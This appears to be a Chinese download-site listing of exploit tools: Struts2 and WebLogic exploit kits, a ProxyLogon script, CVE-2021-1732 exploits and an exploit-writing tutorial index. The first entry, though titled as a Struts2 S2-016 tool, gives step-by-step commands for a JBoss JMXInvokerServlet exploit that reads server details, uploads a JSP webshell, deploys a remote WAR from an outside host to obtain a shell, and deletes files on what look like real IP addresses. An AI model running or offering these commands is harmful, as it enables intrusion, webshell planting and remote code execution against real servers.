K8 Struts2 Exploit(S2-016 CVE-2013-2251)漏洞利用工具
Struts2 S2-016 漏洞工具 Exploit
2021-06-28 13:44:24
28KB
1
1. 查看系统名称
java -jar jboss_exploit_fat.jar -i http://123.232.119.98:9009/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSName
2. 查看系统版本
java -jar jboss_exploit_fat.jar -i http://192.168.7.84:10081/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSVersion
3.远程创建文件
java -jar jboss_exploit_fat.jar -i http://192.168.7.84:10081/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository store myname.war index .jsp $content$ true -s java.lang.String;java.lang.String;java.lang.String;java.lang.String;java.lang.Boolean
$content$内容是同目录下的shell.jsp文件内容
即:将shell.jsp文件上传到服务器上,最终部署的war访问:
http://192.168.7.84:10081/myname/index.jsp
如果有mynameok 表示部署成功
使用client.htm客户端进行连接即可(需要修改ip等信息)
4.远程部署war
java -jar jboss_exploit_fat.jar -i http://192.168.7.84:10081/invoker/JMXInvokerServlet invoke jboss.system:service=MainDeployer deploy http://scriptsgenie.com/demo/test.war
获得shell地址:
http://192.168.7.84:10081/test/shell.jsp
5.远程删除文件D:\jboss\server\default\deploy\management\myname.war\index.jsp文件
java -jar jboss_exploit_fat.jar -i http://192.168.7.84:10081/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository remove myname index .jsp
6.支持输入用户名和密码 带验证的情况
java -jar jboss_exploit_fat.jar -u name -p password -i http://192.168.7.84:10081/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository remove myname index .jsp
7.支持代理模式
java -jar jboss_exploit_fat.jar -P http://127.0.0.1:8080 -i http://192.168.7.84:10081/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository remove myname index .jsp
2021-06-12 14:14:11
4.36MB
1
weblogic_exploit
weblogic的利用漏洞工具请立即获取iTunes CVE_2015_4852 CVE_2016_0638 CVE_2016_3510 CVE_2017_10271 CVE_2017_3248 CVE_2018_2628 CVE_2018_2893 CVE_2018_2894 CVE_2018_3252 CVE_2018_3191 CVE_2018_3245 CVE_2019_2725 CVE_2019_2729 CVE_2020_2551 CVE_2020_2555支持突破回显,不支持的是使用dnslog进行判断编译后的jar地址
2021-06-07 00:55:01
171.03MB
1
K8 Struts2远程代码执行漏洞利用工具 (Apache Struts Remote Code Execution Exploit)
Struts2漏洞检测工具 Struts2漏洞测试工具 K8 struts2 exploit Test Struts2 GetShell
目前已支持以下struts2漏洞编号 (S2-005 s2-009 s2-013 s2-016 s2-019 s2-020)
[+] S2-020 CVE-2014-0094 支持GetShell (这洞特殊,EXP集成在飞刀)
[+] S2-019 CVE-2013-4316 支持GetShell/获取物理路径/执行CMD命令
[+] S2-016 CVE-2013-2251 支持GetShell/获取物理路径/执行CMD命令
[+] S2-013 CVE-2013-1966 支持GetShell/获取物理路径/执行CMD命令
[+] S2-009 CVE-2011-3923 支持GetShell/获取物理路径/执行CMD命令
[+] S2-005 CVE-2010-1870 支持GetShell/获取物理路径/执行CMD命令/列文件目录
2021-05-25 15:42:43
27KB
1
看雪论坛倾力翻译推荐的栈溢出方面最为完整,最为全面的教程,第一章至第十章。
目录如下:
Exploit 编写系列教程第一篇:栈溢出...............................................................................3
Exploit 编写系列教程第二篇:跳至ShellCode............................................................25
Exploit 编写系列教程第三篇a:基亍SEH 的Exploit.................................................54
Exploit 编写系列教程第三篇b:基亍SEH 的Exploit—又一个实例........................77
Exploit 编写系列教程第四篇:编写Metasploit Exploit.............................................83
Exploit 编写系列教程第五篇:利用调试器模块及插件加速exploit 开发.................94
Exploit 编写系列教程第六篇:绕过Cookie,SafeSeh,HW DEP 和ASLR..............126
Exploit 编写系列教程第七篇:编写Unicode Exploit................................................218
Exploit 编写系列教程第八篇:Win32 Egg Hunting..................................................256
Exploit 编写系列教程第九篇:Win32 Shellcode 编写入门......................................316
Exploit 编写系列教程第十篇:利用ROP 绕过DEP.....................................................432
附录A:对《基亍栈的溢出》一文的补充.......................................................................509
附录B:对《编写unicode exploit》一文的补充........................................................511
2021-05-17 15:02:33
12.94MB
1
代理登录漏洞
proxylogon漏洞-CVE-2021-26857
用法:
python exploit.py
2021-04-08 14:16:42
3KB
1
CVE-2021-1732研究及Exploit开发,详细讲述了CVE-2021-1732的漏洞原理以及POC开发和Exploit开发,以及最终的Exp代码。来源于看雪某位大佬
2021-03-30 15:02:20
893KB
1
CVE-2021-1732-Exploit
CVE-2021-1732漏洞利用
仅在Windows10 1909 x64上测试
2021-03-11 19:57:48
1.24MB
1